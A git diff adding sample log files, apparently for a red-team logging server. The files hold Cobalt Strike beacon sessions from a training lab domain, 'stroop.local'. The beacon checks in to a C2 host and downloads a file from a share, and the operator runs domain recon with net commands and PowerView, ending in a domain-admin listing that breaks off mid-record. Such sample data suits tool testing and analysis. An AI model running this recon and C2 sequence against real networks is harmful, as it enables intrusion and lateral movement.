+03/29/2020 10:57 AM Office16
+03/29/2020 10:57 AM 3,643,833,378 Office16x86.zip
+03/29/2020 11:02 AM 3,048,960 puttyx64.msi
+03/29/2020 11:02 AM 1,973,624 sysmon64.exe
+03/29/2020 11:02 AM 113,354 sysmonconfig-export.xml
+03/29/2020 11:03 AM 55,854,864 VSCodeUserSetup-x64-1.40.2.exe
+ 11 File(s) 3,803,083,039 bytes
+ 3 Dir(s) 106,498,801,664 bytes free
+
+
+03/30 09:34:16 UTC [checkin] host called home, sent: 36 bytes
+03/30 09:34:22 UTC [input] download \\s-win43\Software\sysmonconfig-export.xml
+03/30 09:34:22 UTC [task] Tasked beacon to download \\s-win43\Software\sysmonconfig-export.xml
+03/30 09:34:26 UTC [checkin] host called home, sent: 50 bytes
+03/30 09:34:26 UTC [output]
+started download of \\s-win43\Software\sysmonconfig-export.xml (113354 bytes)
+
+03/30 09:34:26 UTC [output]
+download of sysmonconfig-export.xml is complete
+
+03/30 12:21:48 UTC [input] sleep 60 5
+03/30 12:21:48 UTC [task] Tasked beacon to sleep for 60s (5% jitter)
+03/30 12:21:49 UTC [checkin] host called home, sent: 16 bytes
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_688141424.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_688141424.log
new file mode 100644
index 00000000..52fc5fc4
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_688141424.log
@@ -0,0 +1,896 @@
+03/30 08:13:57 UTC [metadata] 13.81.175.116 <- 10.1.3.10; computer: L-WIN223; user: w.tax; process: mousedrivercontrol.exe; pid: 4208; os: Windows; version: 6.2; beacon arch: x64 (x64)
+03/30 08:14:40 UTC [input] ps
+03/30 08:14:40 UTC [task] Tasked beacon to list processes
+03/30 08:14:44 UTC [checkin] host called home, sent: 12 bytes
+03/30 08:14:44 UTC [output]
+[System Process] 0 0
+System 0 4
+Registry 4 88
+smss.exe 4 404
+csrss.exe 496 512
+wininit.exe 496 588
+csrss.exe 580 596
+winlogon.exe 580 680
+services.exe 588 688
+lsass.exe 588 728
+svchost.exe 688 836
+fontdrvhost.exe 680 844
+fontdrvhost.exe 588 852
+svchost.exe 688 920
+svchost.exe 688 972
+svchost.exe 688 1012
+LogonUI.exe 680 496
+dwm.exe 680 756
+svchost.exe 688 1040
+svchost.exe 688 1132
+svchost.exe 688 1140
+svchost.exe 688 1148
+svchost.exe 688 1156
+svchost.exe 688 1264
+svchost.exe 688 1304
+svchost.exe 688 1332
+svchost.exe 688 1368
+svchost.exe 688 1424
+svchost.exe 688 1464
+svchost.exe 688 1484
+svchost.exe 688 1620
+svchost.exe 688 1628
+svchost.exe 688 1732
+svchost.exe 688 1756
+svchost.exe 688 1772
+svchost.exe 688 1832
+taskhostw.exe 1132 1848
+svchost.exe 688 1872
+svchost.exe 688 1904
+svchost.exe 688 1924
+svchost.exe 688 2012
+svchost.exe 688 1528
+svchost.exe 688 1568
+svchost.exe 688 2052
+svchost.exe 688 2112
+svchost.exe 688 2240
+Memory Compression 4 2248
+svchost.exe 688 2284
+VSSVC.exe 688 2320
+svchost.exe 688 2384
+svchost.exe 688 2428
+svchost.exe 688 2448
+svchost.exe 688 2568
+svchost.exe 688 2656
+svchost.exe 688 2664
+svchost.exe 688 2672
+svchost.exe 688 2788
+svchost.exe 688 2796
+svchost.exe 688 2804
+svchost.exe 688 2920
+svchost.exe 688 2928
+spoolsv.exe 688 2512
+OfficeClickToRun.exe 688 3320
+sysmon64.exe 688 3328
+WaAppAgent.exe 688 3336
+WindowsAzureTelemetryService.exe 688 3344
+WindowsAzureGuestAgent.exe 688 3352
+WindowsAzureNetAgent.exe 688 3360
+svchost.exe 688 3368
+svchost.exe 688 3376
+svchost.exe 688 3384
+svchost.exe 688 
3392
+svchost.exe 688 3400
+svchost.exe 688 3408
+svchost.exe 688 3416
+MsMpEng.exe 688 3424
+svchost.exe 688 3432
+svchost.exe 688 3796
+VFPlugin.exe 3360 3896
+conhost.exe 3896 3960
+unsecapp.exe 920 3236
+WmiPrvSE.exe 920 4104
+svchost.exe 688 4424
+WmiPrvSE.exe 920 4712
+svchost.exe 688 4924
+svchost.exe 688 4960
+csrss.exe 5148 5156
+winlogon.exe 5148 5200
+fontdrvhost.exe 5200 5364
+dwm.exe 5200 5436
+svchost.exe 688 5628
+rdpclip.exe 1040 5988 x64 STROOP\w.tax 2
+sihost.exe 1484 6036 x64 STROOP\w.tax 2
+svchost.exe 688 6056 x64 STROOP\w.tax 2
+svchost.exe 688 6116 x64 STROOP\w.tax 2
+taskhostw.exe 1132 5312 x64 STROOP\w.tax 2
+svchost.exe 688 5592
+svchost.exe 688 4792
+ctfmon.exe 4792 5016 x64 STROOP\w.tax 2
+explorer.exe 6212 6236 x64 STROOP\w.tax 2
+svchost.exe 688 6252
+svchost.exe 688 6424 x64 STROOP\w.tax 2
+ShellExperienceHost.exe 920 6664 x64 STROOP\w.tax 2
+svchost.exe 688 6784
+SearchUI.exe 920 6832 x64 STROOP\w.tax 2
+RuntimeBroker.exe 920 6956 x64 STROOP\w.tax 2
+RuntimeBroker.exe 920 7112 x64 STROOP\w.tax 2
+RuntimeBroker.exe 920 6712 x64 STROOP\w.tax 2
+SearchIndexer.exe 688 6708
+svchost.exe 688 7208
+svchost.exe 688 7244
+svchost.exe 688 7316
+smartscreen.exe 920 7428 x64 STROOP\w.tax 2
+SecurityHealthSystray.exe 6236 7472 x64 STROOP\w.tax 2
+SecurityHealthService.exe 688 7512
+svchost.exe 688 7780
+WaSecAgentProv.exe 3336 5764
+conhost.exe 5764 6940
+SgrmBroker.exe 688 5720
+svchost.exe 688 1720
+svchost.exe 688 1992
+svchost.exe 688 2104 x64 STROOP\w.tax 2
+WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe 920 1456 x64 STROOP\w.tax 2
+dllhost.exe 920 3028 x64 STROOP\w.tax 2
+chrome.exe 6236 4396 x64 STROOP\w.tax 2
+svchost.exe 688 4752
+chrome.exe 4396 6272 x64 STROOP\w.tax 2
+chrome.exe 4396 5484 x64 STROOP\w.tax 2
+chrome.exe 4396 7688 x64 STROOP\w.tax 2
+chrome.exe 4396 7728 x64 STROOP\w.tax 2
+chrome.exe 4396 5080 x64 STROOP\w.tax 2
+POWERPNT.EXE 6236 6440 x86 STROOP\w.tax 2
+chrome.exe 4396 800 x64 STROOP\w.tax 2
+chrome.exe 4396 152 x64 STROOP\w.tax 2
+WINWORD.EXE 2908 2212 x86 STROOP\w.tax 2
+rundll32.exe 2212 7872 x86 STROOP\w.tax 2
+MSOSYNC.EXE 6440 1644 x86 STROOP\w.tax 2
+svchost.exe 688 3724
+svchost.exe 688 3728
+SystemSettings.exe 920 7268 x64 STROOP\w.tax 2
+ApplicationFrameHost.exe 920 6520 x64 STROOP\w.tax 2
+svchost.exe 688 7640
+svchost.exe 688 4988
+svchost.exe 688 6636
+audiodg.exe 2568 4636 x64 0
+Taskmgr.exe 6236 8172 x64 STROOP\w.tax 2
+mousedrivercontrol.exe 7872 4208 x64 STROOP\w.tax 2
+
+
+03/30 08:16:47 UTC [input] net
+03/30 08:16:47 UTC [error] net error: not enough arguments
+03/30 08:17:06 UTC [input] net domain
+03/30 08:17:06 UTC [task] <> Tasked beacon to run net domain
+03/30 08:17:09 UTC [checkin] host called home, sent: 26700 bytes
+03/30 08:17:09 UTC [output]
+received output:
+stroop.local
+
+03/30 08:17:17 UTC [input] net dclist
+03/30 08:17:17 UTC [task] Tasked beacon to run net dclist
+03/30 08:17:18 UTC [checkin] host called home, sent: 104506 bytes
+03/30 08:17:20 UTC [output]
+received output:
+DCs:
+
+
+
+03/30 08:17:35 UTC [output]
+received output:
+ Server Name IP Address Platform Version Type Comment
+ ----------- ---------- -------- ------- ---- -------
+[-] Error: 6118
+
+
+03/30 08:17:43 UTC [input] net dclist stroop.local
+03/30 08:17:43 UTC [task] Tasked beacon to run net dclist on stroop.local
+03/30 08:17:44 UTC [checkin] host called home, sent: 104506 bytes
+03/30 08:17:45 UTC [output]
+received output:
+DCs in domain 'stroop.local':
+
+
+
+03/30 08:18:14 UTC [output]
+received output:
+ Server Name IP Address Platform Version Type Comment
+ ----------- ---------- -------- ------- ---- -------
+[-] Error: 6118
+
+
+03/30 08:18:18 UTC [input] net domain_controllers stroop.local
+03/30 08:18:18 UTC [task] Tasked beacon to run net domain_controllers on stroop.local
+03/30 08:18:18 UTC [checkin] host called home, sent: 104518 bytes
+03/30 08:18:20 UTC [output]
+received output:
+Domain Controllers in domain 'stroop.local':
+
+ Server Name IP Address
+ ----------- ----------
+ S-WIN22 10.2.1.10
+ S-WIN21 10.1.2.10
+
+
+03/30 08:18:33 UTC [input] net logons
+03/30 08:18:33 UTC [task] Tasked beacon to run net logons on localhost
+03/30 08:18:34 UTC [checkin] host called home, sent: 104506 bytes
+03/30 08:18:36 UTC [output]
+received output:
+Logged on users at \\localhost:
+
+STROOP\W.Tax
+STROOP\W.Tax
+STROOP\L-WIN223$
+STROOP\L-WIN223$
+STROOP\L-WIN223$
+STROOP\L-WIN223$
+STROOP\L-WIN223$
+STROOP\L-WIN223$
+STROOP\L-WIN223$
+STROOP\L-WIN223$
+
+
+03/30 08:18:48 UTC [input] net logons \\s-win21
+03/30 08:18:48 UTC [task] Tasked beacon to run net logons on s-win21
+03/30 08:18:51 UTC [checkin] host called home, sent: 104506 bytes
+03/30 08:18:53 UTC [output]
+received output:
+Logged on users at \\s-win21:
+
+[-] Error: 5
+
+
+03/30 08:19:16 UTC [input] shell net user
+03/30 08:19:16 UTC [task] Tasked beacon to run: net user
+03/30 08:19:16 UTC [checkin] host called home, sent: 39 bytes
+03/30 08:19:17 UTC [output]
+received output:
+
+User accounts for \\L-WIN223
+
+-------------------------------------------------------------------------------
+bofh DefaultAccount Guest
+WDAGUtilityAccount
+The command completed successfully.
+
+
+
+03/30 08:19:27 UTC [input] shell net whoami
+03/30 08:19:27 UTC [task] Tasked beacon to run: net whoami
+03/30 08:19:31 UTC [checkin] host called home, sent: 41 bytes
+03/30 08:19:31 UTC [output]
+received output:
+The syntax of this command is:
+
+NET
+ [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
+ HELPMSG | LOCALGROUP | PAUSE | SESSION | SHARE | START |
+ STATISTICS | STOP | TIME | USE | USER | VIEW ]
+
+
+03/30 08:19:59 UTC [input] shell net whoami /all
+03/30 08:19:59 UTC [task] Tasked beacon to run: net whoami /all
+03/30 08:20:00 UTC [checkin] host called home, sent: 46 bytes
+03/30 08:20:00 UTC [output]
+received output:
+The syntax of this command is:
+
+NET
+ [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
+ HELPMSG | LOCALGROUP | PAUSE | SESSION | SHARE | START |
+ STATISTICS | STOP | TIME | USE | USER | VIEW ]
+
+
+03/30 08:20:04 UTC [input] shell whoami /all
+03/30 08:20:04 UTC [task] Tasked beacon to run: whoami /all
+03/30 08:20:05 UTC [checkin] host called home, sent: 42 bytes
+03/30 08:20:05 UTC [output]
+received output:
+
+USER INFORMATION
+----------------
+
+User Name SID
+============ ==============================================
+stroop\w.tax S-1-5-21-2163199188-2306780613-1636707950-4076
+
+
+GROUP INFORMATION
+-----------------
+
+Group Name Type SID Attributes
+========================================== ================ ============================================== ==================================================
+Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
+BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
+BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
+BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
+NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
+NT AUTHORITY\INTERACTIVE 
Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
+NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
+NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
+LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
+STROOP\IT-webmail Group S-1-5-21-2163199188-2306780613-1636707950-2716 Mandatory group, Enabled by default, Enabled group
+STROOP\SalesMarketingExt Group S-1-5-21-2163199188-2306780613-1636707950-2709 Mandatory group, Enabled by default, Enabled group
+STROOP\IT-ProxyAll Group S-1-5-21-2163199188-2306780613-1636707950-2714 Mandatory group, Enabled by default, Enabled group
+STROOP\All-RUS Group S-1-5-21-2163199188-2306780613-1636707950-2732 Mandatory group, Enabled by default, Enabled group
+STROOP\SalesRUS Group S-1-5-21-2163199188-2306780613-1636707950-2705 Mandatory group, Enabled by default, Enabled group
+STROOP\IT-MobileUsers Group S-1-5-21-2163199188-2306780613-1636707950-2715 Mandatory group, Enabled by default, Enabled group
+Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
+Mandatory Label\Medium Mandatory Level Label S-1-16-8192
+
+
+PRIVILEGES INFORMATION
+----------------------
+
+Privilege Name Description State
+============================= ==================================== ========
+SeShutdownPrivilege Shut down the system Disabled
+SeChangeNotifyPrivilege Bypass traverse checking Enabled
+SeUndockPrivilege Remove computer from docking station Disabled
+SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
+SeTimeZonePrivilege Change the time zone Disabled
+
+
+USER CLAIMS INFORMATION
+-----------------------
+
+User claims unknown.
+
+Kerberos support for Dynamic Access Control on this device has been disabled.
+
+
+03/30 08:20:39 UTC [input] net sessions
+03/30 08:20:39 UTC [task] Tasked beacon to run net sessions on localhost
+03/30 08:20:43 UTC [checkin] host called home, sent: 104508 bytes
+03/30 08:20:46 UTC [output]
+received output:
+Sessions for \\localhost:
+
+ Computer User name Active (s) Idle (s)
+ -------- --------- ---------- --------
+ \\[::1] W.Tax 0 0
+
+
+03/30 08:20:52 UTC [input] net share
+03/30 08:20:52 UTC [task] Tasked beacon to run net share on localhost
+03/30 08:20:56 UTC [checkin] host called home, sent: 104505 bytes
+03/30 08:20:58 UTC [output]
+received output:
+Shares at \\localhost:
+
+ Share name Comment
+ ---------- -------
+ ADMIN$ Remote Admin
+ C$ Default share
+ D$ Default share
+ IPC$ Remote IPC
+
+
+03/30 08:21:03 UTC [input] net user
+03/30 08:21:03 UTC [task] Tasked beacon to run net user on localhost
+03/30 08:21:07 UTC [checkin] host called home, sent: 104504 bytes
+03/30 08:21:09 UTC [output]
+received output:
+Users for \\localhost:
+
+bofh (admin)
+DefaultAccount
+Guest
+WDAGUtilityAccount
+
+
+03/30 08:21:27 UTC [input] net user \\s-win21 stroop\w.tax
+03/30 08:21:27 UTC [task] Tasked beacon to run net user stroop\w.tax on s-win21
+03/30 08:21:28 UTC [checkin] host called home, sent: 104504 bytes
+03/30 08:21:30 UTC [output]
+received output:
+Account information for stroop\w.tax on \\s-win21:
+
+[-] Error: 2221
+
+
+03/30 08:21:33 UTC [input] net user \\s-win21 w.tax
+03/30 08:21:33 UTC [task] Tasked beacon to run net user w.tax on s-win21
+03/30 08:21:35 UTC [checkin] host called home, sent: 104504 bytes
+03/30 08:21:37 UTC [output]
+received output:
+Account information for w.tax on \\s-win21:
+
+User name W.Tax
+Full Name
+Comment
+User's Comment
+Country code 0
+Account active Yes
+Account expires Never
+Account type User
+
+Password last set 22 hours ago
+Password expires Yes
+Password changeable Yes
+Password required Yes
+User may change password Yes
+
+Workstations allowed
+Logon script
+User profile
+Home directory 
\\S-win43\UserHome$\W.Tax
+Last logon 03/29/2020 11:49:35
+
+
+03/30 08:22:18 UTC [input] net group \\s-win21 'domain users'
+03/30 08:22:18 UTC [task] Tasked beacon to run net group 'domain users' on s-win21
+03/30 08:22:20 UTC [checkin] host called home, sent: 104505 bytes
+03/30 08:22:22 UTC [output]
+received output:
+Members of 'domain users' on \\s-win21:
+
+
+
+03/30 08:22:36 UTC [input] net group \\s-win21 'domain admins'
+03/30 08:22:37 UTC [task] Tasked beacon to run net group 'domain admins' on s-win21
+03/30 08:22:41 UTC [checkin] host called home, sent: 104505 bytes
+03/30 08:22:43 UTC [output]
+received output:
+Members of 'domain admins' on \\s-win21:
+
+
+
+03/30 08:22:52 UTC [input] net view
+03/30 08:22:52 UTC [task] Tasked beacon to run net view
+03/30 08:22:53 UTC [checkin] host called home, sent: 104504 bytes
+03/30 08:22:55 UTC [output]
+received output:
+List of hosts:
+
+
+
+03/30 08:23:08 UTC [input] net view stroop.local
+03/30 08:23:08 UTC [task] Tasked beacon to run net view on stroop.local
+03/30 08:23:09 UTC [checkin] host called home, sent: 104504 bytes
+03/30 08:23:11 UTC [output]
+received output:
+ Server Name IP Address Platform Version Type Comment
+ ----------- ---------- -------- ------- ---- -------
+[-] Error: 6118
+
+
+03/30 08:23:11 UTC [output]
+received output:
+List of hosts for domain 'stroop.local':
+
+
+
+03/30 08:23:22 UTC [input] powershell-import
+03/30 08:23:39 UTC [task] Tasked beacon to import: C:\Users\outflank\Desktop\Training\Lab7 - internal recon\PowerView.ps1
+03/30 08:23:39 UTC [checkin] host called home, sent: 101224 bytes
+03/30 08:23:40 UTC [output]
+received output:
+ Server Name IP Address Platform Version Type Comment
+ ----------- ---------- -------- ------- ---- -------
+[-] Error: 6118
+
+
+03/30 08:23:50 UTC [input] powershell get-netuser w.tax
+03/30 08:23:50 UTC [task] Tasked beacon to run: get-netuser w.tax
+03/30 08:23:54 UTC [checkin] host called home, sent: 313 bytes
+03/30 08:23:56 UTC 
[output]
+received output:
+#< CLIXML
+
+
+logoncount : 4
+distinguishedname : CN=W.Tax,OU=User,OU=Accounts,DC=stroop,DC=local
+objectclass : {top, person, organizationalPerson, user}
+lastlogontimestamp : 3/29/2020 11:36:13 AM
+name : W.Tax
+objectsid : S-1-5-21-2163199188-2306780613-1636707950-4076
+samaccountname : W.Tax
+codepage : 0
+homedirectory : \\S-win43\UserHome$\W.Tax
+samaccounttype : 805306368
+countrycode : 0
+cn : W.Tax
+accountexpires : 9223372036854775807
+whenchanged : 3/29/2020 11:45:05 AM
+instancetype : 4
+usncreated : 14979
+objectguid : 6694a63e-28cd-425c-afb4-9b218ec8d013
+objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=stroop,DC=local
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+memberof : {CN=SalesRUS,OU=Sales,OU=Groups,DC=stroop,DC=local,
+ CN=SalesMarketingExt,OU=Sales,OU=Groups,DC=stroop,DC=local,
+ CN=All-RUS,OU=Users,OU=Groups,DC=stroop,DC=local,
+ CN=IT-MobileUsers,OU=IT,OU=Corp,OU=Groups,DC=stroop,DC=local...}
+lastlogon : 3/30/2020 7:45:36 AM
+adspath : LDAP://CN=W.Tax,OU=User,OU=Accounts,DC=stroop,DC=local
+homedrive : H:
+useraccountcontrol : 512
+whencreated : 3/29/2020 10:04:19 AM
+primarygroupid : 513
+pwdlastset : 3/29/2020 10:04:19 AM
+usnchanged : 31037
+
+
+
+System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1
+
+03/30 08:24:22 UTC [input] powershell get-netlocalgroup -computername l-win223
+03/30 08:24:22 UTC [task] Tasked beacon to run: get-netlocalgroup -computername l-win223
+03/30 08:24:25 UTC [checkin] host called home, sent: 377 bytes
+03/30 08:24:29 UTC [output]
+received output:
+#< CLIXML
+
+
+ComputerName : l-win223
+AccountName : STROOP/l-win223/bofh
+IsDomain : False
+IsGroup : False
+SID : S-1-5-21-3005677839-2763426082-3693314417-500
+Description : Built-in account for administering the computer/domain
+PwdLastSet : 3/29/2020 2:17:30 AM
+PwdExpired : False
+UserFlags : 66049
+Disabled : False
+LastLogin : 3/30/2020 8:20:09 AM
+
+ComputerName : 
l-win223 +AccountName : stroop.local/Domain Admins +IsDomain : True +IsGroup : True +SID : S-1-5-21-2163199188-2306780613-1636707950-512 +Description : +Disabled : +LastLogin : +PwdLastSet : +PwdExpired : +UserFlags : + +ComputerName : l-win223 +AccountName : stroop.local/svc-bsservice +IsDomain : True +IsGroup : False +SID : S-1-5-21-2163199188-2306780613-1636707950-4820 +Description : +Disabled : +LastLogin : 3/29/2020 3:35:29 PM +PwdLastSet : +PwdExpired : +UserFlags : + +ComputerName : l-win223 +AccountName : stroop.local/W.Tax +IsDomain : True +IsGroup : False +SID : S-1-5-21-2163199188-2306780613-1636707950-4076 +Description : +Disabled : +LastLogin : 3/30/2020 7:45:36 AM +PwdLastSet : +PwdExpired : +UserFlags : + + + +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:24:59 UTC [input] powershell get-netgroup -username w.tax +03/30 08:24:59 UTC [task] Tasked beacon to run: get-netgroup -username w.tax +03/30 08:25:02 UTC [checkin] host called home, sent: 345 bytes +03/30 08:25:04 UTC [output] +received output: +#< CLIXML +STROOP\IT-MobileUsers +STROOP\SalesRUS +STROOP\All-RUS +STROOP\IT-ProxyAll +STROOP\SalesMarketingExt +STROOP\Domain Users +STROOP\IT-webmail +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:25:23 UTC [input] poweshell get-netgroupmember -groupanem "domain admins +03/30 08:25:24 UTC [error] Unknown command: poweshell get-netgroupmember -groupanem "domain admins +03/30 08:25:31 UTC [input] poweshell get-netgroupmember -groupname "domain admins +03/30 08:25:31 UTC [error] Unknown command: poweshell get-netgroupmember -groupname "domain admins +03/30 08:25:35 UTC [input] powershell get-netgroupmember -groupname "domain admins +03/30 08:25:35 UTC [task] Tasked beacon to run: get-netgroupmember -groupname "domain admins +03/30 08:25:36 UTC [checkin] host called home, sent: 389 bytes +03/30 08:25:37 UTC [output] 
+received output: +#< CLIXML +The string is missing the terminator: "._x000D__x000A_ + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException_x000D__x000A_ + FullyQualifiedErrorId : TerminatorExpectedAtEndOfString_x000D__x000A_ _x000D__x000A_ + +03/30 08:25:42 UTC [input] powershell get-netgroupmember -groupname "domain admins" +03/30 08:25:42 UTC [task] Tasked beacon to run: get-netgroupmember -groupname "domain admins" +03/30 08:25:47 UTC [checkin] host called home, sent: 393 bytes +03/30 08:25:49 UTC [output] +received output: +#< CLIXML + + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : svc-linuxldap +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4819 +IsGroup : False +MemberDN : CN=svc-linuxldap,OU=IT,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : svc-test +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4818 +IsGroup : False +MemberDN : CN=svc-test,OU=IT,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : svc-proxy +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4816 +IsGroup : False +MemberDN : CN=svc-proxy,OU=IT,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : svc-backupserver +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4814 +IsGroup : False +MemberDN : CN=svc-backupserver,OU=IT,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : svc-av-control +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4812 +IsGroup : False +MemberDN : CN=svc-av-control,OU=IT,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-M.vanBers +MemberSID : 
S-1-5-21-2163199188-2306780613-1636707950-4745 +IsGroup : False +MemberDN : CN=ADMIN-M.vanBers,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-M.vanLonden +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4744 +IsGroup : False +MemberDN : CN=ADMIN-M.vanLonden,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-Y.Koelen +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4743 +IsGroup : False +MemberDN : CN=ADMIN-Y.Koelen,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-A.Jansen +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4742 +IsGroup : False +MemberDN : CN=ADMIN-A.Jansen,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-C.Noteboom +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4741 +IsGroup : False +MemberDN : CN=ADMIN-C.Noteboom,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-J.Schippers +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4740 +IsGroup : False +MemberDN : CN=ADMIN-J.Schippers,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-W.Hovens +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4739 +IsGroup : False +MemberDN : CN=ADMIN-W.Hovens,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-A.Henneman +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4738 +IsGroup : False +MemberDN : CN=ADMIN-A.Henneman,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : 
stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-R.Nijenhuis +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4737 +IsGroup : False +MemberDN : CN=ADMIN-R.Nijenhuis,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-J.deBeurs +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4736 +IsGroup : False +MemberDN : CN=ADMIN-J.deBeurs,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-L.vanDinther +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4735 +IsGroup : False +MemberDN : CN=ADMIN-L.vanDinther,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-T.Verkroost +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4734 +IsGroup : False +MemberDN : CN=ADMIN-T.Verkroost,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-K.Pleiter +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4733 +IsGroup : False +MemberDN : CN=ADMIN-K.Pleiter,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-L.Okhuijsen +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4732 +IsGroup : False +MemberDN : CN=ADMIN-L.Okhuijsen,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-W.Trommel +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4731 +IsGroup : False +MemberDN : CN=ADMIN-W.Trommel,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-U.Kerver +MemberSID : 
S-1-5-21-2163199188-2306780613-1636707950-4730 +IsGroup : False +MemberDN : CN=ADMIN-U.Kerver,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-A.Kool +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4729 +IsGroup : False +MemberDN : CN=ADMIN-A.Kool,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-Z.Verheij +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4728 +IsGroup : False +MemberDN : CN=ADMIN-Z.Verheij,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-S.Verbaas +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4727 +IsGroup : False +MemberDN : CN=ADMIN-S.Verbaas,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-J.Mathot +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4726 +IsGroup : False +MemberDN : CN=ADMIN-J.Mathot,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-R.Domburg +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4725 +IsGroup : False +MemberDN : 